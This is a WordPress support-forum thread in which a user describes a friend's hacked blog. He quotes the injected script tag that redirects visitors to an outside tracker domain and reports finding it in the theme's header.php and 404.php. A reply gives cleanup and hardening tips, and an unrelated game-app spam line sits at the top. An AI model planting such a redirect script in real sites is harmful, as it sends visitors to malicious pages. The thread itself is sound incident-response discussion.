Kulay Game online,Volaclub apps download latest version.Recharge Every day and Get Bonus up-to 50%!

tginsandiego
(@tginsandiego)

15 years, 2 months ago

Hey folks,

My friend (who is awfully sweet, but not very technical) just had her wordpress blog hijacked. I’m technical, but not familiar with WordPress — I used an http traffic sniffer to find the offending code:

<script>location=”https://mapstracker.cn/?pid=317&sid=84dd6f”;</script><!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”https://www.w3.org/1999/xhtml” dir=”ltr” lang=”en-US”>
<head profile=”https://gmpg.org/xfn/11″>

Notice the <script> that gets sent even before the DOCTYPE…

But I’m in the dark about how wordpress generates the pages, and I’m unfamiliar with webpage script injection.

Are there any good samaritans out there that could
1. Help me fix her site
2. Help her harden her installation so it doesn’t happen again?

Thanks

Terry

Viewing 3 replies - 1 through 3 (of 3 total)

Thread Starter tginsandiego
(@tginsandiego)

15 years, 2 months ago

PS — I was able to determine that she is using WordPress version 2.8.6

Thread Starter tginsandiego
(@tginsandiego)

15 years, 2 months ago

Found and fixed the bad code. They had injected the script tags into header.php and 404.php inside the theme.

Once I had backed up the site to my local hard disk, I was able to use a findfile tool to search the entire site and locate the offending code pretty easily. Searching for <script> quickly located the code, because all of the real/good script tags used by wordpress typically don’t close the tag without specifying a text/javascript type.

So the important lesson I learned was to use a traffic sniffer (like FIDDLER) to quickly see what’s going on

I would still appreciate it if some kind expert could help my friend harden her site.

Thanks

Terry

alism
(@alism)

15 years, 2 months ago

Couldn’t you have just right clicked, then viewed the page source? I think a traffic sniffer is perhaps overkill for this particular problem, but if it worked for you, great! Did you check the sql database itself too by the way?

Anyway, why was she hacked? Not keeping her version of WordPress up to date? Rubbish host? Other insecure script? Obvious password?

There’s a good hack clean guide here:
https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

Hardening wise, think about htpasswd protecting her wp-admin folder. If you can limit access to a certain IP, even better.

Make sure there’s a good backup routine in place. You can download plugins to do this automagically, ie:
https://www.ads-software.com/extend/plugins/wp-db-backup/

Change all passwords, admin, database and FTP to something strong.

Have a read of this too:
https://codex.www.ads-software.com/Hardening_WordPress

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘A friend’s site was hacked…’ is closed to new replies.

A friend’s site was hacked…

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics